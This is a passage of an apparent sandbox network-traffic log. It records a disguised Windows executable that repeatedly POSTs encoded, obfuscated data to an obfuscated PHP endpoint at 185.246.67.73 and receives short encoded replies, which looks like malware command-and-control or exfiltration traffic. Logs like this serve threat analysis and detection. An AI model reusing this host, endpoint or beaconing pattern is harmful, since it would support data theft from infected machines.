Connection: Keep-Alive
Dec 8, 2024 15:27:27.278898001 CET | 12360 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 51 6d 4b 65 6c 43 50 4d 4a 4e 64 50 54 78 59 62 32 57 75 6f 51 38 51 65 4b 4b 4f 39 52 6a 61 38 71 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
Data Ascii: ------QmKelCPMJNdPTxYb2WuoQ8QeKKO9Rja8qHContent-Disposition: form-data; name="0"Content-Type: text/plainPXFQ^CPRT^PY[_YXY[YWWWQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY
Dec 8, 2024 15:27:27.399445057 CET | 2472 | OUT | Data Raw: 38 5a 73 64 30 6f 31 76 53 33 65 79 68 36 53 34 68 58 77 4c 66 37 31 68 75 79 7a 62 44 61 33 4a 4e 4b 4b 74 46 6b 34 58 4d 70 67 5a 64 70 6b 31 57 65 54 6d 31 6f 49 41 71 6b 38 6b 41 30 38 61 6f 45 52 58 65 32 58 64 46 61 39 79 33 77 59 35 51 63
Data Ascii: 8Zsd0o1vS3eyh6S4hXwLf71huyzbDa3JNKKtFk4XMpgZdpk1WeTm1oIAqk8kA08aoERXe2XdFa9y3wY5Qco//0Z0jI8JC08ubQSK6mX00tWnByV4MoD596sWlAYGG/mXvYRH6xoSqD7QizgARnWfUmM3WPsIlDKQnLyEvgynUpdboNTPv3keB3MugFdi+3GMV0DOYQ6A4l5E9nGbiFIiNd5BNIYzEwox6hzziWmQU6hIERFYXkI
Dec 8, 2024 15:27:27.399477005 CET | 2472 | OUT | Data Raw: 55 4a 4a 69 61 45 41 74 32 52 66 66 41 4d 37 36 4e 72 35 55 68 45 35 35 74 4c 43 59 41 6e 54 4b 7a 68 79 31 6b 46 34 76 42 42 61 2b 44 75 32 38 51 76 31 63 6b 73 4e 46 4f 6e 65 49 37 46 79 58 45 56 77 7a 62 57 78 74 6c 49 76 4f 77 30 6c 73 34 67
Data Ascii: UJJiaEAt2RffAM76Nr5UhE55tLCYAnTKzhy1kF4vBBa+Du28Qv1cksNFOneI7FyXEVwzbWxtlIvOw0ls4g//2f5dfz7v6uNzbW/WHowKu+ZRgG4FC9t3dxfjQ4ystnh3Jxi7TJN+PR7aeN0w14p9ptN74pZkKmY8kS5BLWXarMGZkEf8HfAiWNfQzDQ/CP35hlhk46A+cpT8qO7Db5I8ucBzr7G5wVCQAoTYxqzvz5BRp3fi5z2
Dec 8, 2024 15:27:27.399532080 CET | 4944 | OUT | Data Raw: 6e 43 53 64 51 33 4a 68 56 69 78 75 4c 76 6e 44 4a 6a 6b 71 74 68 2f 46 76 61 63 39 2f 34 71 61 51 6d 6e 37 5a 48 32 59 72 46 6f 6c 75 44 64 44 4e 72 41 4e 73 6f 31 59 48 79 4f 72 37 6b 6a 76 34 63 46 76 64 39 7a 4a 66 34 34 77 66 32 37 62 72 54
Data Ascii: nCSdQ3JhVixuLvnDJjkqth/Fvac9/4qaQmn7ZH2YrFoluDdDNrANso1YHyOr7kjv4cFvd9zJf44wf27brT3rz/Yt3Y8Mth0wqpiTvFs6Ey3cO3kz9wwyTeC7dFRVx7vILb2MO3HtZLnzb5FL6TFMh35qedUUYMrMLWdrrzD0ZwcFmIaCDNyiLLR3EjQZoaBtffr6QYygWMW8uVKq4LneFcUb3ZxMDx65vWyQuNbwpe79R+/zvl+
Dec 8, 2024 15:27:27.399647951 CET | 4944 | OUT | Data Raw: 74 68 52 4f 34 63 73 32 63 6a 43 50 54 48 45 57 66 71 37 53 6d 4e 4a 6a 46 5a 46 76 78 57 4d 75 44 57 57 77 54 56 38 32 4f 30 70 42 7a 6c 4f 41 4b 4e 43 49 2f 77 72 6b 4f 71 70 68 73 30 37 71 6d 6e 4d 4c 2f 53 78 68 38 2f 74 44 78 65 2f 44 2b 52
Data Ascii: thRO4cs2cjCPTHEWfq7SmNJjFZFvxWMuDWWwTV82O0pBzlOAKNCI/wrkOqphs07qmnML/Sxh8/tDxe/D+Rw3l2KD+0nX4TU65wixXkhTugu3F56PBw6UX/r0vb3O0XHBbgnTUYiYHj8ol9A+T3hTO7f+LSylt7xBwvmM1N8XPDXFiL3+N1m0PLX8HVZiqWaZ43WJHxvnyBpGCnhm6P2a/MZyWUe94noNhHgsrOpRe7P6m1rriNN
Dec 8, 2024 15:27:27.399776936 CET | 4944 | OUT | Data Raw: 35 4b 6b 52 65 74 46 56 44 41 6b 2f 76 4a 6c 39 7a 63 45 71 72 55 63 6a 58 56 50 57 6d 79 32 43 49 69 73 62 63 7a 47 45 4e 6a 46 56 4d 46 71 58 6c 54 30 37 71 2f 6c 58 37 4f 73 76 55 34 49 39 75 35 6e 6c 31 7a 4f 30 6b 6b 56 62 51 5a 68 69 44 7a
Data Ascii: 5KkRetFVDAk/vJl9zcEqrUcjXVPWmy2CIisbczGENjFVMFqXlT07q/lX7OsvU4I9u5nl1zO0kkVbQZhiDziYDxkxF131YLDqX2r4FcasyM7AhLGilfREH/pfc2kBTbUZYRFaNB8l5c47TrXZM6W/zJOmVU6n8DQ0lkIgMhKht6mev94di/q83UOQ3g8KrbS2KTJu9ubQxobi4WRydAxSpShVWjr9cYmC/WMScqnYKcaUfIX+rqi
Dec 8, 2024 15:27:27.399806976 CET | 4944 | OUT | Data Raw: 77 79 36 6c 50 7a 4d 46 74 48 77 63 75 78 51 37 5a 54 6c 64 52 35 38 37 4b 31 36 70 70 6c 50 54 62 78 41 58 51 6f 63 57 52 38 6d 39 67 6a 58 52 58 45 64 70 48 38 6d 48 69 6c 66 4d 32 73 4f 30 53 32 67 6e 65 43 53 74 37 42 6f 74 30 33 76 55 66 48
Data Ascii: wy6lPzMFtHwcuxQ7ZTldR587K16pplPTbxAXQocWR8m9gjXRXEdpH8mHilfM2sO0S2gneCSt7Bot03vUfHTwC+Q3k0zL8g0aAgd/KjzYmBtbZAsxwc0lrICOPncX2N749N5zVhk/u3RvKdiPSTvxDnOmM/GD1rA34gNSRYXmA9zPuRxVeKb97/Wyj98jmh1/lTpPVrzj2SqiKLXWcZF26MJBGWZGIaMkJjnleNFl4n3CgvxEwJ2
Dec 8, 2024 15:27:27.519068956 CET | 4944 | OUT | Data Raw: 52 64 2f 34 43 53 4e 36 65 57 67 4e 39 65 58 2f 5a 6f 78 2f 53 64 4c 68 39 77 36 67 4e 63 50 49 52 57 77 56 2f 33 79 6b 44 4c 30 6d 2f 38 57 74 31 50 2b 65 31 32 55 56 5a 6c 46 4b 62 59 6a 2b 6f 6b 73 49 4a 72 52 76 4f 6f 32 65 36 2f 34 2f 75 65
Data Ascii: Rd/4CSN6eWgN9eX/Zox/SdLh9w6gNcPIRWwV/3ykDL0m/8Wt1P+e12UVZlFKbYj+oksIJrRvOo2e6/4/ueX596Dq5+7xe3X1Ul/WfjGLeFJu7Zj4X53+qwPo+GBdLBLr8o0eZrP4IcHovVKOpqt6B/EPusj+m64a+V+bxQ2a6McWgqfuklbA3Tbt9cJX1tsDXk2bDpG8VVP79cte4Z3RootVako33MAmV9bqUv5I02B8SoLHxhk
Dec 8, 2024 15:27:27.519087076 CET | 4944 | OUT | Data Raw: 51 51 37 74 46 58 75 45 41 75 6f 77 69 48 78 36 2f 79 4c 38 66 7a 36 71 68 6f 58 76 49 36 46 6f 4f 31 2f 2f 43 48 52 2b 62 58 53 39 37 76 39 49 4e 64 74 2f 71 4a 5a 48 45 33 32 76 78 2b 51 2f 4a 4b 72 2f 4a 6a 45 54 53 63 58 5a 50 48 31 41 31 43
Data Ascii: QQ7tFXuEAuowiHx6/yL8fz6qhoXvI6FoO1//CHR+bXS97v9INdt/qJZHE32vx+Q/JKr/JjETScXZPH1A1Ce13VR34V4Ng0kESX53997+F4X/gzElC481N8BH+P/FBuLfbID27Ev9izPoR3scUj2nKEDq0uWn9gb5s0IU8E/GooC0pf/Ba2gaep5ni3QNaU+qJDz+kNqLAn7RWnP+PWmo5201bfY6eQipsUnjksKXwJs0qf5RUMO
                                                                                                                      Dec 8, 2024 15:27:27.519159079 CET2472OUTData Raw: 54 6c 52 6a 70 33 64 58 74 7a 70 2b 31 50 44 79 73 43 49 77 2b 4e 72 65 2f 74 37 57 74 73 4f 6b 4b 4a 57 75 68 36 49 58 37 68 69 54 6e 6e 35 4b 43 46 78 71 43 6a 2b 56 66 31 74 37 57 43 5a 75 62 6d 71 49 4b 32 50 67 36 56 4e 6c 53 34 6f 59 4e 66
                                                                                                                      Data Ascii: TlRjp3dXtzp+1PDysCIw+Nre/t7WtsOkKJWuh6IX7hiTnn5KCFxqCj+Vf1t7WCZubmqIK2Pg6VNlS4oYNfltoQVJifjFVrXDTIICsQ7u0aSx+8+z7i4eEau2RpvGUhWch0pptzRpwLXzKLm879iyZ1Sq8QjE5EQF/MdBzMouwU77236kUtL+Xe20aSkOk5p1Jy6i9zqC+6GpGNoibrP9q8iEDyiF0HMLgQIYP22fYb4T+IHgsqX
Dec 8, 2024 15:27:28.261780977 CET  25   IN   HTTP/1.1 100 Continue
Dec 8, 2024 15:27:28.932205915 CET  207  IN   HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:28 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49747        185.246.67.73   80                8028  C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 15:27:27.050385952 CET  562  OUT  POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:27.403839111 CET2584OUTData Raw: 55 5c 43 5d 5b 46 55 53 54 5e 50 59 5b 5a 59 53 59 5d 59 5c 57 55 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U\C][FUST^PY[ZYSY]Y\WUQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.0)2_&609\,$#Z/8$X<X&#=';4<+/ ]!![ (
Dec 8, 2024 15:27:28.380140066 CET  25   IN   HTTP/1.1 100 Continue
Dec 8, 2024 15:27:28.612236023 CET  207  IN   HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:28 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49748        185.246.67.73   80                8028  C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 15:27:28.961730957 CET  538  OUT  POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:29.310036898 CET2584OUTData Raw: 50 5d 43 51 5b 41 50 54 54 5e 50 59 5b 5e 59 5d 59 59 59 5f 57 55 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P]CQ[APTT^PY[^Y]YYY_WUQWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.[3["&)# )]-42 "X/+3$'012;" /</+ ]!![ 8
Dec 8, 2024 15:27:30.290189028 CET  25   IN   HTTP/1.1 100 Continue
Dec 8, 2024 15:27:30.538415909 CET  151  IN   HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:30 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.4  49749        185.246.67.73   80                8028  C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 15:27:30.104617119 CET  538  OUT  POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 1904
    Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:30.450773954 CET1904OUTData Raw: 55 58 46 56 5e 47 55 52 54 5e 50 59 5b 51 59 53 59 5c 59 5c 57 54 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UXFV^GURT^PY[QYSY\Y\WTQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.%>>&_9X!0*-':#8Y.(;0-,Y15&;!#?Z/; ]!![
Dec 8, 2024 15:27:31.437135935 CET  25   IN   HTTP/1.1 100 Continue
Dec 8, 2024 15:27:31.676366091 CET  324  IN   HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:31 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 152
    Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 1f 31 1c 2b 1d 3e 3a 39 00 27 3f 27 58 30 2b 20 02 2a 20 33 16 24 5f 27 02 2c 14 23 56 23 2f 20 5e 24 3d 02 5d 21 02 3b 1a 39 38 20 5a 06 10 21 5e 26 06 3f 10 3f 28 21 5d 26 2b 21 42 35 0e 20 1c 30 2d 2b 19 2a 04 0b 04 37 3f 3f 56 32 3d 03 1e 3a 36 3d 07 32 33 30 09 26 0c 2c 55 0f 1f 26 18 26 31 38 0f 22 34 3e 12 22 23 3b 17 31 35 0c 57 36 01 2b 0f 3f 03 24 5b 3c 0c 0e 5c 34 0b 27 5e 2e 2b 29 5e 3d 54 20 0c 24 06 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 91+>:9'?'X0+ * 3$_',#V#/ ^$=]!;98 Z!^&??(!]&+!B5 0-+*7??V2=:6=230&,U&&18"4>"#;15W6+?$[<\4'^.+)^=T $ S*.T3VR


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.4  49750        185.246.67.73   80                8028  C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 15:27:30.922065020 CET  538  OUT  POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:31.299752951 CET2584OUTData Raw: 50 53 43 54 5e 40 55 53 54 5e 50 59 5b 5c 59 5b 59 58 59 59 57 56 51 56 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSCT^@UST^PY[\Y[YXYYWVQVYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3[11:!55Y.':Y4/; ' Z2 %&+7'^/ ]!![ 0
Dec 8, 2024 15:27:32.238776922 CET  25   IN   HTTP/1.1 100 Continue
Dec 8, 2024 15:27:32.472199917 CET  151  IN   HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:32 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.4  49751        185.246.67.73   80                8028  C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 15:27:32.708889961 CET  538  OUT  POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:33.060019970 CET2584OUTData Raw: 55 5f 46 53 5e 44 55 50 54 5e 50 59 5b 5e 59 5b 59 55 59 5d 57 50 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U_FS^DUPT^PY[^Y[YUY]WPQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-%>.2%5*:B*_"8&X8;?$><20.\'+:7;.; ]!![ 8
Dec 8, 2024 15:27:34.033162117 CET  25   IN   HTTP/1.1 100 Continue
Dec 8, 2024 15:27:34.269157887 CET  151  IN   HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:33 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.4  49752        185.246.67.73   80                8028  C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 15:27:34.510154009 CET  562  OUT  POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:34.856924057 CET2584OUTData Raw: 55 58 46 50 5b 46 55 53 54 5e 50 59 5b 5f 59 5d 59 5d 59 5c 57 54 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UXFP[FUST^PY[_Y]Y]Y\WTQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.%-5%."!Z,4#Z/+8S$>#%=&("7</ ]!![
Dec 8, 2024 15:27:35.831799030 CET  25   IN   HTTP/1.1 100 Continue
Dec 8, 2024 15:27:36.064136028 CET  207  IN   HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:35 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.4  49753        185.246.67.73   80                8028  C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 15:27:36.301444054 CET  562  OUT  POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:36.656260014 CET2584OUTData Raw: 55 5f 43 52 5e 40 55 57 54 5e 50 59 5b 5d 59 53 59 58 59 5b 57 53 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U_CR^@UWT^PY[]YSYXY[WSQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-0..1=!#-'.Y4[/($$=?'#*2+& ?8/ ]!![ 4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49754 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:36.808207989 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 1904
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:27:37.153835058 CET | 1904 | OUT | Data Raw: 50 5b 46 54 5e 43 55 55 54 5e 50 59 5b 50 59 5c 59 54 59 5b 57 52 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: P[FT^CUUT^PY[PY\YTY[WRQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-0==X%*="9].$]4"[88+$X,Y%3*^&+&X48 ]!![
Dec 8, 2024 15:27:38.154244900 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:38.392328978 CET | 380 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:37 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 152
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 06 13 3a 0f 32 26 23 53 3e 03 3a 1e 27 2c 3b 5a 27 2b 23 5f 2b 30 05 15 24 07 3c 5d 38 39 2f 1d 21 3c 2b 05 30 2d 02 5d 36 05 30 08 2d 12 20 5a 06 10 22 02 25 59 3c 00 2a 28 25 5b 24 38 25 40 36 34 20 1c 27 3d 05 51 3e 14 07 07 37 01 02 0f 32 03 0f 56 2d 0b 35 00 26 30 02 0f 31 1c 2c 55 0f 1f 25 0b 33 0b 28 0a 37 37 3d 0d 20 30 20 07 32 0b 29 0b 22 06 30 57 2a 2e 3c 11 28 22 38 5c 22 21 24 06 2c 38 2d 14 2a 0b 28 09 33 3c 20 53 2a 02 2e 54 0d 33 56 52
    Data Ascii: :2&#S>:',;Z'+#_+0$<]89/!<+0-]60- Z"%Y<*(%[$8%@64 '=Q>72V-5&01,U%3(77= 0 2)"0W*.<("8\"!$,8-*(3< S*.T3VR
